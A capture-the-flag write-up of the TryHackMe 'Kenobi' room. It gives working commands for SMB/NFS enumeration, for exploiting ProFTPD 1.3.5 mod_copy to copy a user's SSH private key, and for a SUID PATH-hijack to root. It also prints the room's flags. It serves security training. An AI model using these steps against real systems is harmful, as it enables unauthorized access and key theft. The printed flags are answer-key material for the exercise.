Kenobi: TryHackMe Walkthrough Writeup.

Ansul Kotadia
6 min read · May 31, 2024


Kenobi THM

Task 1: Deploy the vulnerable machine

#1. Scan the machine with nmap, how many ports are open?

nmap -vvv 10.10.241.243

Answer: 7

Task 2: Enumerating Samba for shares

Using nmap we can enumerate a machine for SMB shares.

Nmap has the ability to run scripts that automate a wide variety of networking tasks. There is a script to enumerate shares!

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.241.243

Using the enum4linux tool

Alternatively, we can use the enum4linux tool to discover the shares exposed by the machine. Given that the target runs the Samba service, this tool lets us identify both the number and the types of active shares. The enum4linux command and its output were shown as screenshots and are not reproduced here.

#1. Using the nmap command above, how many shares have been found?

Answer: 3

On most distributions of Linux smbclient is already installed. Let's inspect one of the shares.

smbclient //10.10.241.243/anonymous

Using your machine, connect to the machine's network share.

For the password just press "Enter".

#2. Once you're connected, list the files on the share. What file can you see?

Answer: log.txt

You can recursively download the SMB share too. Submit the username and password as nothing.

smbget -R smb://10.10.241.243/anonymous

Open the file on the share. There are a few interesting things in it.

To read the file without downloading it, run the following inside the smbclient session:

more log.txt
  • Information generated for Kenobi when an SSH key was generated for the user
  • Information about the ProFTPD server.

#3. What port is FTP running on?

Answer: 21

The earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it is prepared to serve.

In our case, port 111 gives access to a network file system (NFS). Let's use nmap to enumerate it.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.241.243

#4. What mount can we see?

Answer: /var

Task 3: Gain initial access with ProFtpd

Let's get the version of ProFTPD. Use netcat to connect to the machine on the FTP port; the server banner reveals it.

#1. What is the version?

Answer: 1.3.5

We can use searchsploit to find exploits for a particular software version.

Searchsploit is basically just a command line search tool for exploit-db.com.

#2. How many exploits are there for the ProFTPd running?

Answer: 4

Between performing the task and writing the blog alongside it, my AttackBox time limit was reached, so I had to use my own Kali machine for the remaining tasks.

The mod_copy module implements the SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. In ProFTPD 1.3.5 any unauthenticated client can issue these commands (CVE-2015-3306), copying any file the ProFTPD process can read to any location it can write.

We know that the FTP service is running as the kenobi user (from the log file on the share) and that an SSH key was generated for that user, so the daemon can read that user's private key for us.

We’re now going to copy Kenobi’s private key using SITE CPFR and SITE CPTO commands.

So just netcat to the machine:

nc 10.10.241.243 21

Then copy the id_rsa file to the /var/tmp directory, which sits inside the /var export we found via NFS:

┌──(kali㉿kali)-[~]
└─$ nc 10.10.241.243 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.241.243]

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

SITE CPTO /var/tmp/id_rsa
250 Copy successful

Let's mount the exported /var directory (which contains /var/tmp) on our machine. Mounting needs root, hence sudo:

sudo mkdir /mnt/kenobiNFS
sudo mount 10.10.241.243:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have a network mount on our attacking machine! We can go to /var/tmp, grab the private key and log in to Kenobi's account.

┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kenobi@10.10.241.243

Boom! And we get the access:

#3. What is Kenobi’s user flag (/home/kenobi/user.txt)?

Answer: d0b0f3f53b6caa532a83915e19224899

Task 4: Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous. Some binaries such as passwd need to run with elevated privileges (as they reset your password on the system), but other custom files that have the SUID bit set can lead to all sorts of issues. To search a system for this type of file, run the following:

find / -perm -u=s -type f 2>/dev/null

Running the command gives us the following output:

#1. What file looks particularly out of the ordinary?

Answer: /usr/bin/menu

#2. Run the binary, how many options appear?

Answer: 3

Strings is a command on Linux that looks for human-readable strings in a binary.

Running it on /usr/bin/menu shows that the binary calls its helper programs by bare name (e.g. curl and uname) rather than by full path (e.g. /usr/bin/curl or /usr/bin/uname), so each one is looked up through the PATH environment variable of whoever runs menu.

As this file runs with the root user's privileges, we can manipulate our PATH to gain a root shell.

We copied the /bin/sh shell, named the copy curl, gave it execute permissions and then put its directory at the front of our PATH. This meant that when the /usr/bin/menu binary ran curl, it used our PATH variable to find the "curl" binary, which is actually a copy of /bin/sh. As the SUID bit makes menu run as root, it runs our shell as root! (This relies on the copied shell keeping the effective UID of 0; bash drops it when the real and effective UIDs differ unless started with -p, which is why a copy of /bin/sh rather than /bin/bash is the safer choice.)
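To see the mechanism without touching a SUID binary, here is an added shell example (not code from the original post or from the TryHackMe room) that stands in for /usr/bin/menu with a function calling uname by bare name, plants a fake uname in a temporary directory, and shows that only the bare-name call is hijacked while an absolute-path call is not. The function names, the temporary directory and the use of uname instead of curl are assumptions of this example; the commented-out line near the end restates the steps the post describes against the real target and is not executed.

```sh
#!/bin/sh
# Added example: PATH hijacking against a program that calls helpers by bare
# name. Nothing here is SUID; the fake "uname" only prints a marker where the
# real attack would drop into a copy of /bin/sh running as root.

# Hypothetical stand-in for the vulnerable /usr/bin/menu: "uname" is resolved
# through $PATH, as the strings output of the real binary indicates.
vulnerable_menu() {
    uname -r
}

# Hardened variant: an absolute path is never subject to PATH lookup.
hardened_menu() {
    /bin/uname -r
}

# Create a directory holding a malicious "uname" and print the directory path.
setup_hijack() {
    hijack_dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$hijack_dir/uname"
    chmod 755 "$hijack_dir/uname"
    echo "$hijack_dir"
}

# Run a command with the attacker's directory prepended to PATH, inside a
# subshell so the caller's own environment is left untouched.
run_with_hijacked_path() {
    dir=$1
    shift
    ( PATH="$dir:$PATH"; export PATH; "$@" )
}

# Demonstration when the script is executed directly.
demo_dir=$(setup_hijack)
echo "clean PATH,    vulnerable: $(vulnerable_menu)"
echo "hijacked PATH, vulnerable: $(run_with_hijacked_path "$demo_dir" vulnerable_menu)"
echo "hijacked PATH, hardened:   $(run_with_hijacked_path "$demo_dir" hardened_menu)"
rm -rf "$demo_dir"

# On the real target the same idea, as described in the post, looks like
# (not run here):
#   cp /bin/sh /tmp/curl; chmod 755 /tmp/curl; export PATH=/tmp:$PATH; /usr/bin/menu
```

The fix on the defensive side is the one the hardened variant shows: a privileged program must invoke helpers by absolute path (or reset PATH to a known-safe value itself) rather than trusting the caller's environment.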

#3. What is the root flag (/root/root.txt)?

Answer: 177b3cd8562289f37382721c28381f02

The End. Thank you!
